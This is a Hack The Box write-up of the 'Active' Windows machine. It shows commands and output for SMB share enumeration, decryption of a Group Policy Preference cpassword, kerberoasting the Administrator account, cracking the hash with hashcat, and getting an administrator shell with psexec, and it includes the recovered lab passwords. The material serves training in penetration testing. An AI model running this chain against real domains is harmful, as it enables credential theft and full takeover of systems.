## Introduction

Active is an easy windows machine from Hack The Box where the attacker will have to dig inside the available windows' shares in order to find a Group Policy Preference credential for a user account in the Active Directory. Finally, doing kerberoasting we are able to identify a service being run as Administrator where we can obtain its Administrator’s Kerberos 5 hash for a later password cracking, grating us an interactive shell.

## Enumeration

As always, let's start finding all opened ports in the machine with **nmap**.

```bash
kali@kali:~/Documents/HTB/Active$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.100
Host is up (0.049s latency).
Not shown: 65491 closed ports
PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
268/tcp   filtered td-replica
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
[...]

# Nmap done at Sun Jul  4 17:18:50 2021 -- 1 IP address (1 host up) scanned in 88.19 seconds
```

Then, we continue with a deeper scan of every opened port, getting more information about each service.

```bash
kali@kali:~/Documents/HTB/Active$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.098s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 21:48:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
[...]
Host script results:
|_clock-skew: 12m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-04T21:49:00
|_  start_date: 2021-07-04T17:54:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 17:36:31 2021 -- 1 IP address (1 host up) scanned in 70.35 seconds
```

Enumerating the Windows shares with **smbmap** obtains that the share `Replication` is enumerable.

```bash
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                10459647 blocks of size 4096. 5728355 blocks available

```

Looking inside there is a file `Groups.xml` at `\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\`.

```bash
kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                10459647 blocks of size 4096. 5721526 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> 
```

## Exploitation

This file contains the username `active.htb\SVC_TGS` and its encrypted password.

```xml
kali@kali:~/Documents/HTB/Active$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

In order to decrypt the password we need to execute the following command.

```sql
kali@kali:~/Documents/HTB/Active$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
```

Now, we have access to the `Users` share.

```bash
kali@kali:~/Documents/HTB/Active$ smbmap -H 10.10.10.100 -u SVC_TGS -p  GPPstillStandingStrong2k18 
[+] IP: 10.10.10.100:445        Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

```

Inside it we can obtain the user flag in the directory `\SVC_TGS\Desktop\`.

```sql
kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Users -U "SVC_TGS%GPPstillStandingStrong2k18"
smb: \> cd SVC_TGS/Desktop/
smb: \SVC_TGS\Desktop\> dir
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018                  
  user.txt   

                10459647 blocks of size 4096. 5721270 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

```

## Privilege Escalation

Because we have some domain credentials we can try [kerberoasting](https://attack.stealthbits.com/cracking-kerberos-tgs-tickets-using-kerberoasting) using the tool [GetUserSPNs.py](https://github.com/SecureAuthCorp/impacket)

```sql
kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783         

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```

However, we have an issue due to the time difference between our machine and the kerberos service. In order to fix this problem we only need to execute the following commands.

```bash
kali@kali:~/Documents/HTB/Active$ sudo apt install ntpdate -y
kali@kali:~/Documents/HTB/Active$ sudo ntpdate 10.10.10.100
 5 Jul 08:09:15 ntpdate[10305]: step time server 10.10.10.100 offset +754.495116 sec
```

Once fixed, we obtain the Administrator's TGS ticket in hashcat format.

```sql
kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783

kali@kali:~/Documents/HTB/Active$ GetUserSPNs.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$493a9db3c8618a0037b2e1bec356a0c8$87170780c60ed56f8428e0eaa90f79d305c5505b73c267ef6d60ecc1cc1e4cb9090e54de1843b967fe2ffdd2af63d4bd242bb6c809619a075d0c9f2de13a21986de58a5658483e5a604380b7af28a49477bba09ee3beeda12d8b4cf918b1c572bf81b677fbc2ed778008c00be9002c5c54a3a63c2ba2c81d3c860e6ff75df598f3ae46bcf9de0604411681cdf3189e4f414b8db4aac60edb2d43e4ed5c0faecdef69968d24aba8a6b3f1f8c7a7433fba6ef93de064a0532b745c20571cde467c48bc5396e3dbe28ff2f2c34c9346a6061bc12dad9e7b08f2a21a2e1250cb433a938f264e797f0a2fb19ee18e476907819d5f96b581fe45ca575937abc24410986b63590655a63a4d9c05a8f019510b59e8593e3c170a24afa83d619ab2ae87f8bf2bbac689f8e3b86eb352089c865993a2d9f1720bcb2e2bf784ce542b699e3bcbce2a422db530fe642799ca32d5544c1e15dfd8d7b43a8b621337ce366bfaa07e3a9d3bbbe8f8ca42b8a5bcf9c124c84bcb93e5e7206d89e9ba612b6e97ed3d77c54bebb6687141a837020b8f13dc3046221be988634fb2e113d1e759a578302afbc6b9255ae84a8f8052b879964d085afaf51ee57e45b620b342e98bfa0826aa2beeb0292d13a9ae62d58828310e81f8b77c81ea188b4028c201fa32fb87ad5cfff79ec48bbaaa142226fc8f01c60ef77a142f80bc63f3bc56f25f52a86a5b55256d39faec49ea4b60a699b2867412977a775bb435f6fddddbd94326304a3e01f8cb9681d5003d7cb43ecdb802aa52d1a72889930f910ab0855ff5a5dffd1b7f1b0cff95a66dea713cfedf70e0ca8d821f8c8560542b03ef92e668cacb078920c2d018a026c9413de713e2e2cc3629227552443a8c97866df981f8d55c94b644f78311ad4584d668e73ef6dc053a62820bbe69233c0011e092cef4c3fec96809582f16a1de60ab1474f9eaca53f56feb22dec2ce4043009c085734c01f6696906a60b4d8400d77c2fc98eadbca23ffe5657b0ad4b8c2709cc5863ca11683f6d0275ddfc5c29278d4dfed4f3df1fa7e0b050c4acd8aad42f695cb23231d0c3b7ea65345fc4f069c8088ade81b1a3d3fec870d17b3741db2a7a6a96466eb4ddad7357b58d2a85bec43b244d9c6c8343dadd84c00b1423079f60a8413f31303d745313ec0abae0fb571933fc17b5addcef9f85d13dd933b4abda77c7e0fe8ee9219b8bf4f9161e0a0f41ad0a52f80dcf112dfca4d64cb07217971
```

Using **hashcat** we can retrieve the Administrator's password.

```sql
kali@kali:~/Documents/HTB/Active$ hashcat -m 13100 -a 0 GetUserSPNs.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
=============================================================================================================================                                      
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU

Host memory required for this attack: 134 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507                         
* Keyspace..: 14344385

[....]:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...217971
Time.Started.....: Mon Jul  5 08:12:39 2021 (14 secs)
Time.Estimated...: Mon Jul  5 08:12:53 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   753.3 kH/s (7.93ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Mon Jul  5 08:12:22 2021
Stopped: Mon Jul  5 08:12:55 2021

```

Finally, in order to obtain a reverse shell as "Administrator" we need to execute **psexec**.

```sql
kali@kali:~/Documents/HTB/Active$ psexec.py "active.htb/administrator:Ticketmaster1968"@10.10.10.100
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ZxHDWdnx.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RlII on 10.10.10.100.....
[*] Starting service RlII.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
[CENSORED]
```


Active - [HTB]

Introduction

Enumeration

Exploitation

Privilege Escalation